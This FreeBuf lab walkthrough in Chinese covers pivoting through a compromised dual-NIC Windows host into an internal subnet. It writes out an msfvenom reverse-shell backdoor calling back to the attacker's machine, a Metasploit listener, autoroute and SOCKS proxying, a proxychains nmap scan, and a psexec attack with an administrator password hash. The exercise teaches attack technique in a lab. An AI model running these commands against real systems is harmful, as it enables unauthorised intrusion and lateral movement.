freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

内网穿透 跨路由访问
Sunny117 2022-05-21 13:03:32 197254
所属地 广东省

在渗透测试过程中,经常拿到web主机与数据库不同在一个网段,可以得出这台主机还连着一个内网,
如果想要继续渗透内网,可以把这台web主机当作跳板机,对内网进行渗透。imagekali无法直接访问目标主机 但是kali获取受害者的权限 得知可以访问目标主机,所以可以通过受害者做
跳板访问目标主机。

> kali IP:192.168.0.152
image靶机12server5 双网卡:192.168.0.188、10.10.10.139
image靶机12server4IP:10.10.10.138
imagekali跟12server5是这个互ping的
imageimage但是kali 是ping不通12server4的
image假如我们拿到了12server5的服务器权限的话,我们看到它是有两个网卡的,那么我们可以把12server5当做跳板然后访问12server4主机,这样就是跨路由访问,就是不同一个网段的。
首先使用kali生成后门文件:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.152 LPORT=4444 -f exe > shell.exe
image打开msf进行监听:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.0.152
set lport 4444
exploit
image把生成的后门文件放到12server5运行,msf会得到域的一个普通session
imageifconfig查看网卡
image现在我们是可以在meterpreter里面对10.10.10.139进行访问的,可以是用模块对它进行扫描
image但是只能在meterpreter里面访问,在外面还是不行的
image绑定路由 不绑定路由就没法访问目标主机:run autoroute -s 10.10.10.0/24,
run autoroute -p查看是否设好
image我们还需要一个socks,background把session放后台,然后选择use auxiliary/server/socks_proxy模块,这个模块
东西基本都是默认的,不需要更改,直接run

imageimage我们还要编辑隧道配置文件:sudo vi /etc/proxychains4.conf
执行后,拉到最下面,按isocks4改成5IP可以是127,这里我就使用kali的IP了,端口的话设1080,要跟auxiliary/server/socks_proxy模块的端口一致,完成后按ESC然后Shift键加: 在输入wq保存退出。
image接着使用命令扫一下:proxychains4 nmap 10.10.10.138 -sT -A -p 445
image选择use exploit/windows/smb/ms17_010_psexec模块
设置代理:setg Proxies socks5:192.168.0.152:1080
这个参数也要加进去:set ReverseAllowProxy true
imagepsexec这个模块默认是反向连接的,我们使用了代理,要使用正向连接set payload windows/meterpreter/bind_tcp
imageset rhost 10.10.10.138设置目标
set smbuser administrator用户名
set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4管理员密码哈希值,忘记截图了。
image

run了半天没成功,最后发现我模块选错了。。。。。

应该是选:use exploit/windows/smb/psexec
image成功
imageimage
image

本文仅用于技术交流,请勿用于非法用途。

# 内网渗透 # Kali # 内网漫游 # 内网转发
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 Sunny117 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
Sunny117 LV.2
这家伙太懒了,还未填写个人描述!
  • 2 文章数
  • 0 关注者
代码审计之phpmyadmin恶意文件包含漏洞复现
2022-04-20